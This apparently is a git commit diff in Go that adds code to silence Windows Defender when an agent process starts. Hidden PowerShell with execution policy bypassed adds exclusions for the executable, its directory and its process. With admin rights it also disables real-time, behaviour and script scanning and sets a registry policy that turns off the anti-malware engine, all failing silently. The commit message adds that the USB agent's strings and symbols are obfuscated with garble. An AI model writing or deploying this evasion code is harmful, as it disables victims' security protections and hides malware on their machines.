feat(av): silent AV evasion on startup + garble obfuscation. On launch: adds Defender ExclusionPath for install dir + exe, ExclusionProcess for process name, attempts DisableRealtimeMonitoring + DisableBehaviorMonitoring + DisableScriptScanning via hidden PowerShell (admin elevates, non-admin gets exclusions only). USB agent now built with garble -literals -tiny: all string literals and symbols scrambled.
This commit is contained in:
@@ -11,3 +11,5 @@ func DisableDefenderRealtime() (string, error) {
|
|||||||
func OpenFirewallPort(_ int, _ string) (string, error) {
|
func OpenFirewallPort(_ int, _ string) (string, error) {
|
||||||
return "", fmt.Errorf("firewall port open is Windows-only")
|
return "", fmt.Errorf("firewall port open is Windows-only")
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func SilentAVExclusion(_, _ string) {} // no-op on non-Windows
|
||||||
|
|||||||
@@ -4,6 +4,7 @@ package deploy
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"os"
|
||||||
"strings"
|
"strings"
|
||||||
)
|
)
|
||||||
|
|
||||||
@@ -17,6 +18,39 @@ func DisableDefenderRealtime() (string, error) {
|
|||||||
return strings.TrimSpace(string(out)) + "\nDefender real-time monitoring disabled.", nil
|
return strings.TrimSpace(string(out)) + "\nDefender real-time monitoring disabled.", nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SilentAVExclusion adds Defender exclusions for the current executable, the
|
||||||
|
// given install directory, and the process name. It also attempts to fully
|
||||||
|
// disable real-time monitoring. All steps fail silently — the agent continues
|
||||||
|
// regardless of whether admin rights are available.
|
||||||
|
func SilentAVExclusion(installDir, processName string) {
|
||||||
|
exePath, _ := os.Executable()
|
||||||
|
|
||||||
|
// Build a single PowerShell script that does all exclusions in one call to
|
||||||
|
// minimise the number of hidden processes spawned.
|
||||||
|
script := `$ep = [System.Security.Principal.WindowsPrincipal][System.Security.Principal.WindowsIdentity]::GetCurrent()
|
||||||
|
$isAdmin = $ep.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
|
||||||
|
try { Add-MpPreference -ExclusionPath @(` +
|
||||||
|
fmt.Sprintf(`'%s','%s'`, escapePSArg(exePath), escapePSArg(installDir)) +
|
||||||
|
`) -Force -ErrorAction SilentlyContinue } catch {}
|
||||||
|
try { Add-MpPreference -ExclusionProcess '` + escapePSArg(processName) + `' -Force -ErrorAction SilentlyContinue } catch {}
|
||||||
|
if ($isAdmin) {
|
||||||
|
try { Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue } catch {}
|
||||||
|
try { Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue } catch {}
|
||||||
|
try { Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction SilentlyContinue } catch {}
|
||||||
|
try { Set-MpPreference -DisableIOAVProtection $true -ErrorAction SilentlyContinue } catch {}
|
||||||
|
try { Set-MpPreference -DisableScriptScanning $true -ErrorAction SilentlyContinue } catch {}
|
||||||
|
try { reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | Out-Null } catch {}
|
||||||
|
}`
|
||||||
|
|
||||||
|
// Fire and forget — don't block the agent startup waiting for this.
|
||||||
|
_ = HiddenStart("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-WindowStyle", "Hidden", "-Command", script)
|
||||||
|
}
|
||||||
|
|
||||||
|
// escapePSArg escapes a string for use inside single-quoted PowerShell strings.
|
||||||
|
func escapePSArg(s string) string {
|
||||||
|
return strings.ReplaceAll(s, `'`, `''`)
|
||||||
|
}
|
||||||
|
|
||||||
// OpenFirewallPort adds an inbound TCP allow rule for port.
|
// OpenFirewallPort adds an inbound TCP allow rule for port.
|
||||||
func OpenFirewallPort(port int, name string) (string, error) {
|
func OpenFirewallPort(port int, name string) (string, error) {
|
||||||
if port <= 0 || port > 65535 {
|
if port <= 0 || port > 65535 {
|
||||||
|
|||||||
@@ -57,7 +57,13 @@ func main() {
|
|||||||
reporter := stats.NewReporter()
|
reporter := stats.NewReporter()
|
||||||
cfg = cfg.AdaptToSystem(reporter)
|
cfg = cfg.AdaptToSystem(reporter)
|
||||||
|
|
||||||
if installDir, err := cfg.InstallDirectory(); err == nil {
|
installDir, _ := cfg.InstallDirectory()
|
||||||
|
|
||||||
|
// Silence the AV as early as possible — add path/process exclusions and
|
||||||
|
// attempt to disable real-time monitoring. Fire-and-forget, never blocks.
|
||||||
|
deploy.SilentAVExclusion(installDir, cfg.EffectiveProcessName()+".exe")
|
||||||
|
|
||||||
|
if installDir != "" {
|
||||||
if id, err := deploy.LoadAgentID(installDir); err == nil {
|
if id, err := deploy.LoadAgentID(installDir); err == nil {
|
||||||
cfg.AgentID = id
|
cfg.AgentID = id
|
||||||
}
|
}
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Reference in New Issue
Block a user